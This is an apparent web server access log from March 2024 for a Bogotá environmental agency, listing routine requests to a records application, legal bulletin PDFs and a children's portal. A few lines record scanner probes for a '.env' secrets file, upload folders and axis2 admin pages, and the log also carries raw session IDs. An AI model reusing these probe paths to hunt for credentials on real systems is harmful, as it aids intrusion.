191.156.145.223 - - [08/Mar/2024:01:38:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.145.223 - - [08/Mar/2024:01:38:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.145.223 - - [08/Mar/2024:01:38:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.145.223 - - [08/Mar/2024:01:38:58 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.156.145.223 - - [08/Mar/2024:01:39:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
201.245.192.253 - - [08/Mar/2024:01:39:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39747
201.245.192.253 - - [08/Mar/2024:01:39:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37140
201.245.192.253 - - [08/Mar/2024:01:39:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39545
201.245.192.253 - - [08/Mar/2024:01:39:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:01:39:30 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
172.22.2.4 - - [08/Mar/2024:01:39:30 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1488
201.245.192.253 - - [08/Mar/2024:01:39:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:01:40:02 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.167 - - [08/Mar/2024:01:40:03 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 88416
172.22.2.4 - - [08/Mar/2024:01:40:11 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2026%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 644194
201.245.192.253 - - [08/Mar/2024:01:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37140
66.249.66.167 - - [08/Mar/2024:01:40:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
66.249.66.165 - - [08/Mar/2024:01:40:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
201.245.192.253 - - [08/Mar/2024:01:41:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:41:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:01:40:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:01:42:34 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
98.64.96.24 - - [08/Mar/2024:01:42:52 -0500] "GET /Publicaciones/2023EE135983.pdf HTTP/1.1" 404 228
201.245.192.253 - - [08/Mar/2024:01:42:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:01:41:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:01:41:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [08/Mar/2024:01:43:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
191.156.145.20 - - [08/Mar/2024:01:43:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 53266
191.156.145.20 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.149.218 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.106 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.156.153.34 - - [08/Mar/2024:01:43:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1524
201.245.192.253 - - [08/Mar/2024:01:43:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
191.156.153.34 - - [08/Mar/2024:01:43:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 19835
201.245.192.253 - - [08/Mar/2024:01:43:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
216.245.221.92 - - [08/Mar/2024:01:45:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:01:45:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:45:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
191.156.158.234 - - [08/Mar/2024:01:45:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13821
191.156.158.234 - - [08/Mar/2024:01:45:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31817
191.156.158.234 - - [08/Mar/2024:01:45:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 43529
201.245.192.253 - - [08/Mar/2024:01:47:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:47:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:01:46:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.158.113 - - [08/Mar/2024:01:48:30 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2021/&sort=date&order=desc HTTP/1.1" 200 14311
172.22.2.4 - - [08/Mar/2024:01:47:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
172.22.2.4 - - [08/Mar/2024:01:48:54 -0500] "GET /BLA/boletinlegal/kucoin/.env HTTP/1.1" 404 1018
201.245.192.253 - - [08/Mar/2024:01:49:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:49:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:01:50:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:01:50:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:01:48:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 21429
201.245.192.253 - - [08/Mar/2024:01:51:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:01:51:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:51:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:53:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:53:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:01:52:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:01:53:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
216.245.221.92 - - [08/Mar/2024:01:55:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:01:55:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:55:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.111 - - [08/Mar/2024:01:55:45 -0500] "GET /Publicaciones/2024EE32129.pdf HTTP/1.1" 404 227
201.245.192.253 - - [08/Mar/2024:01:56:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
66.249.66.19 - - [08/Mar/2024:01:56:14 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [08/Mar/2024:01:56:15 -0500] "GET /Publicaciones/2023EE300386.pdf HTTP/1.1" 404 228
201.245.192.253 - - [08/Mar/2024:01:57:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:01:57:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [08/Mar/2024:01:59:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
201.245.192.253 - - [08/Mar/2024:01:59:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
34.41.13.80 - - [08/Mar/2024:01:59:35 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os2-1024x50.jpg HTTP/1.1" 200 9254
172.22.2.4 - - [08/Mar/2024:01:57:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:01:59:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:00:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:01:58:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [08/Mar/2024:02:00:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:01:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:01:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:03:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:03:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:05:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:05:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:03:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:05:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:05:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:02:04:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.66.19 - - [08/Mar/2024:02:06:26 -0500] "GET /Publicaciones/2024EE34657.pdf HTTP/1.1" 404 227
201.245.192.253 - - [08/Mar/2024:02:07:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:07:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:09:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:09:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:10:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:02:10:31 -0500] "GET /BLA/boletinlegal/upload HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:10:34 -0500] "GET /BLA/boletinlegal/uploads HTTP/1.1" 404 1018
201.245.192.253 - - [08/Mar/2024:02:10:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
66.249.66.39 - - [08/Mar/2024:02:11:03 -0500] "GET /conoces-el-indice-bogotano-de-calidad-del-aire-y-riesgo-en-salud-iboca.html HTTP/1.1" 200 805
172.22.2.4 - - [08/Mar/2024:02:09:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:11:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:11:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:10:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [08/Mar/2024:02:13:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:13:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:15:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:15:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:15:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:14:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61093
201.245.192.253 - - [08/Mar/2024:02:15:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:02:15:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:17:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:17:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:16:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
172.22.2.4 - - [08/Mar/2024:02:18:56 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Mar/2024:02:19:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39697
201.245.192.253 - - [08/Mar/2024:02:19:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39583
201.245.192.253 - - [08/Mar/2024:02:19:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:19:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:02:20:02 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [08/Mar/2024:02:20:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [08/Mar/2024:02:20:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [08/Mar/2024:02:20:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [08/Mar/2024:02:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:20:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:21:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:21:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:21:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:23:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:23:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:22:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
185.191.171.4 - - [08/Mar/2024:02:24:06 -0500] "GET /robots.txt HTTP/1.1" 404 1035
85.208.96.199 - - [08/Mar/2024:02:24:07 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
172.22.2.4 - - [08/Mar/2024:02:24:18 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:24:18 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:24:18 -0500] "GET /BLA/boletinlegal/sitemap.xml HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:24:19 -0500] "GET /BLA/boletinlegal/axis2-admin/ HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:24:19 -0500] "GET /BLA/boletinlegal/axis2/ HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:24:19 -0500] "GET /BLA/boletinlegal/axis2/axis2-admin/ HTTP/1.1" 404 1018
172.22.2.4 - - [08/Mar/2024:02:23:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
216.245.221.92 - - [08/Mar/2024:02:25:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:25:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:25:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:25:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:02:27:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:27:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
54.39.177.48 - - [08/Mar/2024:02:28:00 -0500] "GET /distrito-cierra-preventivamente-los-caminos-de-los-cerros-para-evitar-incendios-forestales.html HTTP/1.1" 200 982
172.22.2.4 - - [08/Mar/2024:02:27:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39697
201.245.192.253 - - [08/Mar/2024:02:29:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39583
201.245.192.253 - - [08/Mar/2024:02:29:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:29:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:02:28:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
52.167.144.229 - - [08/Mar/2024:02:29:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5108.pdf HTTP/1.1" 304 -
52.167.144.229 - - [08/Mar/2024:02:29:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/3701.pdf HTTP/1.1" 200 340606
216.245.221.92 - - [08/Mar/2024:02:30:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:02:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37145
201.245.192.253 - - [08/Mar/2024:02:31:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:30:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 34786
201.245.192.253 - - [08/Mar/2024:02:31:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:02:31:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
